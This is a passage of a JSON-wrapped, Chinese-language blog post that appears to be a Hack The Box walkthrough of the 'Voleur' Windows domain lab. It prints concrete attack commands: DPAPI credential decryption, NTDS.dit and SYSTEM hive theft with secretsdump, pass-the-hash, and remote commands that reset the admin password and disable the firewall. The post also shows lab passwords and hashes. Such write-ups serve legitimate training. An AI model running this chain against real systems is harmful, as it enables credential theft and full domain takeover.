class=\"language-shell\">\/root\/.local\/bin\/bloodyAD -d voleur.htb -u svc_ldap -k --host dc.voleur.htb set restore todd.wolfe<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752110797292-c00d5346-5d1a-406f-b0d5-57aeaf174454.png\" alt=\"\" \/><\/p>\n<p>\u6062\u590d\u6210\u529f\uff01\u4f7f\u7528\u5982\u4e0b\u7528\u6237\u51ed\u636e\u83b7\u53d6<code>TGT<\/code>\u7968\u636e\uff1a<\/p>\n<ul>\n<li>\u57df\uff1a<code>voleur.htb<\/code><\/li>\n<li>\u7528\u6237\u540d\uff1a<code>todd.wolfe<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>NightT1meP1dg3on14<\/code><\/li>\n<\/ul>\n<pre><code class=\"language-shell\">impacket-getTGT voleur.htb\/todd.wolfe:\"NightT1meP1dg3on14\" -dc-ip 10.10.11.76<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752110922277-6c70c3b6-cd31-4583-9c67-7683daafd2a4.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\uff01<\/p>\n<h2>\u89e3\u5bc6DPAPI\u5bc6\u94a5\u5b58\u50a8\u5e93<\/h2>\n<p>\u6210\u529f\u83b7\u53d6<code>todd.wolfe<\/code>\u7528\u6237\u7968\u636e\u540e\uff0c\u767b\u5f55<code>SMB<\/code>\u670d\u52a1\uff0c\u5bf9<code>IT<\/code>\u5171\u4eab\u4e0b\u7684<code>Second Line Support<\/code>\u76ee\u5f55\u8fdb\u884c\u679a\u4e3e\uff1a<\/p>\n<pre><code class=\"language-shell\">impacket-smbclient voleur.htb\/todd.wolfe@dc.voleur.htb -k -no-pass<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752112506921-a12099d9-c271-48ad-b8cc-9df97d2973e3.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0<code>IT<\/code>\u5171\u4eab\u4e0b<code>\/Second-Line Support\/Archived Users\/todd.wolfe\/<\/code>\u76ee\u5f55\u4e3a\u5907\u4efd\u7684<code>todd.wolfe<\/code>\u7528\u6237\u5bb6\u76ee\u5f55\u3002<\/p>\n<p>\u5c1d\u8bd5\u5728\u5bb6\u76ee\u5f55\u4e0b\u8fdb\u884c\u679a\u4e3e\uff0c\u5728<code>.\/AppData\/Roaming\/Microsoft\/Protect\/S-1-5-21-3927696377-1337352550-2781715495-1110\/<\/code>\u76ee\u5f55\u4e0b\u53d1\u73b0\u4e86<code>todd.wolfe<\/code>\u7528\u6237\u7684<code>DPAPI<\/code>\u4e3b\u5bc6\u94a5\u6587\u4ef6<code>08949382-134f-4c63-b93c-ce52efc0aa88<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752112835166-41a1aafe-f517-42c3-8f19-8e2e51c1e45d.png\" alt=\"\" \/><\/p>\n<p>\u540c\u65f6\uff0c\u8fd8\u5728<code>.\/AppData\/Local\/Microsoft\/Credentials\/<\/code>\u548c<code>.\/AppData\/Roaming\/Microsoft\/Credentials<\/code>\u76ee\u5f55\u4e0b\u53d1\u73b0\u4e86\u4e24\u4e2a<code>DPAPI<\/code>\u51ed\u636e\u5b58\u50a8\u5e93\u6587\u4ef6\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752113091609-fdea3411-2de6-4852-aec2-f85f79ae2992.png\" alt=\"\" \/><\/p>\n<p>\u76f4\u63a5\u4e0b\u8f7d<code>MasterKey<\/code>\u548c\u4e24\u4e2a<code>DPAPI<\/code>\u51ed\u636e\u5e93\uff1a<\/p>\n<pre><code class=\"language-shell\">get .\/AppData\/Roaming\/Microsoft\/Protect\/S-1-5-21-3927696377-1337352550-2781715495-1110\/08949382-134f-4c63-b93c-ce52efc0aa88\nget .\/AppData\/Local\/Microsoft\/Credentials\/DFBE70A7E5CC19A398EBF1B96859CE5D\nget .\/AppData\/Roaming\/Microsoft\/Credentials\/772275FAD58525253490A9B0039791D3<\/code><\/pre>\n<p>\u968f\u540e\uff0c\u5c1d\u8bd5\u4f7f\u7528<code>impacket-dpapi<\/code>\u5de5\u5177\uff0c\u901a\u8fc7<code>todd.wolfe<\/code>\u8eab\u4efd\u8fde\u63a5\u57df\u63a7\uff0c\u83b7\u53d6\u5b58\u50a8\u5728<code>LDAP<\/code>\u6570\u636e\u5e93\u5185\u7684\u5907\u4efd\u5bc6\u94a5\uff0c\u5e76\u89e3\u5bc6\u4e3b\u5bc6\u94a5\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-shell\">impacket-dpapi masterkey -file .\/dpapi\/08949382-134f-4c63-b93c-ce52efc0aa88 -t voleur.htb\/todd.wolfe@dc.voleur.htb -k -no-pass<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752113565302-8458c7cb-d2f2-40a0-a421-ca4b728a8011.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u89e3\u5bc6<code>DPAPI<\/code>\u4e3b\u5bc6\u94a5\uff1a<code>0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83<\/code>\u3002<\/p>\n<p>\u83b7\u53d6\u4e3b\u5bc6\u94a5\u540e\uff0c\u5c1d\u8bd5\u5229\u7528\u5176\u89e3\u5bc6\u51ed\u636e\u5b58\u50a8\u5e93\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-shell\">impacket-dpapi credential -file .\/dpapi\/772275FAD58525253490A9B0039791D3 -key \"0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752113727988-17eefc00-d1c9-45be-bbd4-da94c986230f.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0\u5982\u4e0b\u7528\u6237\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u57df\uff1a<code>voleur.htb<\/code><\/li>\n<li>\u7528\u6237\u540d\uff1a<code>jeremy.combs<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>qT3V9pLXyN7W4m<\/code><\/li>\n<\/ul>\n<p>\u5c1d\u8bd5\u83b7\u53d6<code>TGT<\/code>\u7968\u636e\uff1a<\/p>\n<pre><code class=\"language-shell\">impacket-getTGT voleur.htb\/jeremy.combs:\"qT3V9pLXyN7W4m\" -dc-ip 10.10.11.76<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752113875343-55fe29cc-5f02-43b6-9426-4a179ab607b0.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\uff01<\/p>\n<h2>\u767b\u5f55WSL\u5bb9\u5668\u83b7\u53d6NTDS\u6570\u636e\u5e93\u5907\u4efd<\/h2>\n<p>\u83b7\u53d6<code>jeremy.combs<\/code>\u7528\u6237\u7968\u636e\u540e\uff0c\u767b\u5f55<code>SMB<\/code>\u670d\u52a1<code>IT<\/code>\u5171\u4eab\uff0c\u67e5\u770b\u7b2c\u4e09\u4e2a\u76ee\u5f55\uff1a<\/p>\n<pre><code class=\"language-shell\">export KRB5CCNAME=\/home\/megumin\/Documents\/pentest_notes\/voleur\/jeremy.combs.ccache\nimpacket-smbclient voleur.htb\/jeremy.combs@dc.voleur.htb -k -no-pass<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752114125125-467b2eb4-8fac-4995-98fa-54c034e1621f.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u4e86\u4e00\u4efd<code>SSH<\/code>\u79c1\u94a5\uff0c\u548c\u4e00\u4e2a<code>TXT<\/code>\u6587\u4ef6\uff0c\u9996\u5148\u4f7f\u7528<code>cat<\/code>\u547d\u4ee4\u67e5\u770b<code>Note.txt.txt<\/code>\uff0c\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-plain\">Jeremy,\n\nI've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.\n\nPlease see what you can set up.\n\nThanks,\n\nAdmin<\/code><\/pre>\n<p>\u6587\u4e2d\u8bf4\u7ba1\u7406\u5458\u5df2\u7ecf\u53d7\u591f\u4e86<code>Windows<\/code>\u5907\u4efd\u5de5\u5177\uff0c\u56e0\u6b64\uff0c\u4ed6\u914d\u7f6e\u4e86\u4e00\u4e2a<code>WSL<\/code>\u5bb9\u5668\uff0c\u5e76\u5c1d\u8bd5\u5229\u7528\u4e00\u4e9b<code>Linux<\/code>\u5907\u4efd\u5de5\u5177\u6765\u4ee3\u66ff<code>Windows<\/code>\u5de5\u5177\u3002\u8fd9\u8bf4\u660e\u9776\u673a<code>2222<\/code>\u7aef\u53e3\u7684<code>Linux SSH<\/code>\u5c5e\u4e8e<code>WSL<\/code>\u5bb9\u5668\uff0c\u800c\u4e14\u662f\u4e13\u95e8\u7528\u4e8e\u64cd\u4f5c\u5907\u4efd\u7684\u3002<\/p>\n<p>\u9996\u5148\u5c06<code>SSH<\/code>\u79c1\u94a5\u4e0b\u8f7d\u5230\u672c\u5730\uff1a<\/p>\n<pre><code class=\"language-shell\">get id_rsa\nchmod 400 id_rsa<\/code><\/pre>\n<p>\u968f\u540e\u5c1d\u8bd5\u4f7f\u7528<code>jeremy<\/code>\u3001<code>jeremy.combs<\/code>\u3001<code>admin<\/code>\u7b49\u8bcd\u4f5c\u4e3a\u7528\u6237\u8fdb\u884c\u767b\u5f55\uff0c\u4f46\u5168\u90e8\u5931\u8d25\u4e86\u3002<\/p>\n<p>\u5c1d\u8bd5\u4f7f\u7528\u57df\u5185\u7528\u6237\u540d\u767b\u5f55\uff0c\u6700\u540e\u53d1\u73b0<code>svc_backup<\/code>\u7528\u6237\u662f\u8be5<code>SSH<\/code>\u79c1\u94a5\u7684\u6240\u6709\u8005\uff0c\u53ef\u4ee5\u6b63\u5e38\u767b\u5f55<code>SSH<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">ssh svc_backup@voleur.htb -p 2222 -i id_rsa<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752114703882-9e449cef-807b-4324-85a0-f50048e0569e.png\" alt=\"\" \/><\/p>\n<p>\u767b\u5f55\u6210\u529f\u540e\uff0c\u8fdb\u884c\u76ee\u5f55\u4fe1\u606f\u6536\u96c6\uff0c\u5728<code>\/mnt\/c\/<\/code>\u76ee\u5f55\u4e0b\u53d1\u73b0\uff0c<code>WSL<\/code>\u5bb9\u5668\u76f4\u63a5\u6302\u8f7d\u4e86\u6574\u4e2a\u5bbf\u4e3b\u673a\u7684<code>C<\/code>\u76d8\uff1a<\/p>\n<pre><code class=\"language-shell\">ls -lA \/mnt\nls -lA \/mnt\/c<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752114912942-6b9290f4-3bc4-4376-8011-ab3961a60712.png\" alt=\"\" \/><\/p>\n<p>\u63a8\u6d4b\u6b64<code>WSL<\/code>\u5bb9\u5668\u4ee5<code>svc_backup<\/code>\u57df\u7528\u6237\u8eab\u4efd\u8fd0\u884c\u3002\u5c1d\u8bd5\u518d\u6b21\u67e5\u770b<code>Third-Line Support<\/code>\u5171\u4eab\u76ee\u5f55\uff0c\u53d1\u73b0\u91cc\u9762\u8fd8\u5b58\u5728\u4e00\u4e2a<code>Backups<\/code>\u6587\u4ef6\u5939\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752115089111-24f3d4d5-ad55-47cb-bd90-4cbadb629ff9.png\" alt=\"\" \/><\/p>\n<p>\u76f4\u63a5\u67e5\u770b<code>\/mnt\/c\/IT\/\"Third-Line Support\"\/Backups\/<\/code>\u76ee\u5f55\u4e0b\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-shell\">ls -lAR .\/Backups<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752115213250-1265fc08-3d4d-4099-aff0-d27a6aa4d399.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0<code>NTDS<\/code>\u6570\u636e\u5e93<code>ntds.dit<\/code>\u548c<code>SYSTEM<\/code>\u6ce8\u518c\u8868\u8f6c\u50a8\u6587\u4ef6\uff01\u76f4\u63a5\u4f7f\u7528<code>scp<\/code>\u5c06\u5176\u4f20\u8f93\u5230\u672c\u5730\uff1a<\/p>\n<pre><code class=\"language-shell\">scp -P 2222 svc_backup@voleur.htb:\/mnt\/c\/IT\/\"Third-Line Support\"\/Backups\/\"Active Directory\"\/ntds.dit .\/ntds.dit -i id_rsa\nscp -P 2222 svc_backup@voleur.htb:\/mnt\/c\/IT\/\"Third-Line Support\"\/Backups\/registry\/SYSTEM .\/SYSTEM.hive -i id_rsa<\/code><\/pre>\n<p>\u4e0b\u8f7d\u5b8c\u6bd5\u540e\uff0c\u4f7f\u7528<code>impacket-secretsdump<\/code>\u5de5\u5177\u83b7\u53d6\u4fdd\u5b58\u5728<code>NTDS<\/code>\u6570\u636e\u5e93\u5185\u7684\u57df\u7528\u6237\u51ed\u636e\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-shell\">impacket-secretsdump -ntds .\/ntds.dit -system .\/SYSTEM.hive LOCAL<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752115601747-a14e043d-5fef-43c1-aa98-57a055cc9767.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u83b7\u53d6\u57df\u7ba1\u7406\u5458\u7528\u6237\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u57df\uff1a<code>voleur.htb<\/code><\/li>\n<li>\u7528\u6237\u540d\uff1a<code>Administrator<\/code><\/li>\n<li><code>NTLM<\/code>\u54c8\u5e0c\uff1a<code>e656e07c56d831611b577b160b259ad2<\/code><\/li>\n<\/ul>\n<p>\u76f4\u63a5\u83b7\u53d6\u7ba1\u7406\u5458<code>TGT<\/code>\u7968\u636e\uff1a<\/p>\n<pre><code class=\"language-shell\">impacket-getTGT voleur.htb\/Administrator -hashes aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2 -dc-ip 10.10.11.76<\/code><\/pre>\n<p>\u968f\u540e\u4f7f\u7528\u7968\u636e\u767b\u5f55<code>SMB<\/code>\u7ba1\u7406\u5171\u4eab\uff0c\u66f4\u6539\u7ba1\u7406\u5458\u5bc6\u7801\u5e76\u5f00\u542f\u8fdc\u7a0b\u684c\u9762\uff1a<\/p>\n<pre><code class=\"language-shell\">export KRB5CCNAME=\/home\/megumin\/Documents\/pentest_notes\/voleur\/Administrator.ccache\ncrackmapexec smb dc.voleur.htb -d voleur.htb -u Administrator -k --use-kcache -x \"net user Administrator Asd310056 \/domain\"\ncrackmapexec smb dc.voleur.htb -d voleur.htb -u Administrator -k --use-kcache -x \"netsh advfirewall set allprofiles state off\"\ncrackmapexec smb dc.voleur.htb -d voleur.htb -u Administrator -k --use-kcache -x \"wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1\"<\/code><\/pre>\n<p>\u6700\u540e\uff0c\u4f7f\u7528<code>rdesktop<\/code>\u5de5\u5177\u767b\u5f55<code>RDP<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">rdesktop dc.voleur.htb -p 3389 -g 1440x960 -a 24<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752116404413-63c51cfd-c991-44b1-aa4f-b7215a2c8a8e.png\" alt=\"\" \/><\/p>\n<p><strong>\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.129.20.186\uff08\u975e\u56fa\u5b9aIP\u5730\u5740\uff09 \u9898\u76ee\u51ed\u636e\uff1aryan.naylor \/ HollowOct31Ny &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[18,13],"tags":[],"class_list":["post-313","post","type-post","status-publish","format-standard","hentry","category-htb_season_8","category-windows_machine"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/313","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=313"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/313\/revisions"}],"predecessor-version":[{"id":314,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/313\/revisions\/314"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=313"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=313"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=313"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}